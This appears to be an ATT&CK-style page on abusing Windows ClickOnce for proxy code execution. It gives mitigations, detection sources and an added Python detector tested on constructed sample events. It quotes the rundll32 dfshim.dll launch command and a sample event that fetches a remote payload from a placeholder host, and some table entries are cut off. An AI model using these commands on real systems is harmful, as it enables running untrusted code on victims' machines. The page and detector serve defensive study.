Adversaries may use ClickOnce applications (.appref-ms and .application files) to proxy execution of code through a trusted Windows utility.[1] ClickOnce is a deployment technology that enables a user to create self-updating Windows-based .NET applications (i.e., .XBAP, .EXE, or .DLL) that install and run from a file share or web page with minimal user interaction. The application launches as a child process of DFSVC.EXE, which is responsible for installing, launching, and updating the application.[2]
Because ClickOnce applications receive only limited permissions, they do not require administrative permissions to install.[3] As such, adversaries may abuse ClickOnce to proxy execution of malicious code without needing to escalate privileges.
ClickOnce may be abused in a number of ways. For example, an adversary may rely on User Execution. When a user visits a malicious website, the .NET malware is disguised as legitimate software and a ClickOnce popup is displayed for installation.[4]
Adversaries may also abuse ClickOnce to execute malware via a Rundll32 script using the command rundll32.exe dfshim.dll,ShOpenVerbApplication1.[5]
Additionally, an adversary can move the ClickOnce application file to a remote user’s startup folder for continued malicious code deployment (i.e., Registry Run Keys / Startup Folder).[1][6]
ID | Mitigation | Description
---|---|---
M1045 | Code Signing | Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.[7]
M1042 | Disable or Remove Feature or Program | ClickOnce may not be necessary within an environment and should be disabled if not being used.
M1021 | Restrict Web-Based Content | Disable ClickOnce installations from the internet using the following registry key:
ID | Data Source | Data Component | Detects
---|---|---|---
DS0017 | Command | Command Execution | When executed from the command line, rundll32 is used to call the ClickOnce API functions (ex:
DS0011 | Module | Module Load | Monitor dfsvc.exe child process activity with unsigned module loads, as well as activity associated with dfshim.dll. Compare with a baseline of ClickOnce activity to whitelist applications with valid business use-cases.[2]
DS0009 | Process | Process Creation | Monitor for newly executed child processes of dfsvc.exe that may be indicative of malicious ClickOnce applications.
DS0009 | Process | Process Metadata | Evaluate Event Tracing for Windows (ETW) telemetry associated with ClickOnce deployment execution.
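The Command Execution and Process Creation rows above, turned into detection logic run over sample events. This is an added example, not part of the ATT&CK page: the event records are constructed, the Sysmon-style field names (Image, ParentImage, CommandLine) and the label strings are assumptions, and the allowlist stands in for the baseline of known-good ClickOnce applications the Module Load row recommends.

```python
import ntpath
import re

# Constructed sample process-creation events (not real telemetry). The field
# names Image / ParentImage / CommandLine follow Sysmon Event ID 1 conventions
# and are an assumption of this example.
EVENTS = [
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "rundll32.exe dfshim.dll,ShOpenVerbApplication "
                    "http://example.invalid/payload.application"},
    {"Image": r"C:\Users\alice\AppData\Local\Apps\2.0\XYZ\app.exe",
     "ParentImage": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe",
     "CommandLine": r'"C:\Users\alice\AppData\Local\Apps\2.0\XYZ\app.exe"'},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe readme.txt"},
]

# rundll32 invoking the ClickOnce launcher export in dfshim.dll (DS0017).
DFSHIM_RE = re.compile(r"dfshim\.dll\s*,\s*ShOpenVerbApplication", re.IGNORECASE)


def classify(event, allowlist=frozenset()):
    """Return the detection labels that fire for one process-creation event.
    allowlist: lower-case image basenames of ClickOnce apps with a known
    business use, so baselined dfsvc.exe children are not flagged."""
    image = ntpath.basename(event.get("Image", "")).lower()
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    cmd = event.get("CommandLine", "")
    hits = []
    if image == "rundll32.exe" and DFSHIM_RE.search(cmd):
        hits.append("rundll32_dfshim_ShOpenVerbApplication")
    # DS0009 Process Creation: any child of dfsvc.exe not already baselined.
    if parent == "dfsvc.exe" and image not in allowlist:
        hits.append("dfsvc_child_process")
    return hits


def scan(events, allowlist=frozenset()):
    """Return (index, labels) for every event that triggers at least one rule."""
    results = []
    for i, event in enumerate(events):
        labels = classify(event, allowlist)
        if labels:
            results.append((i, labels))
    return results
```

Running scan(EVENTS) flags the first two constructed events and ignores the notepad.exe launch; passing allowlist={"app.exe"} suppresses the baselined dfsvc.exe child.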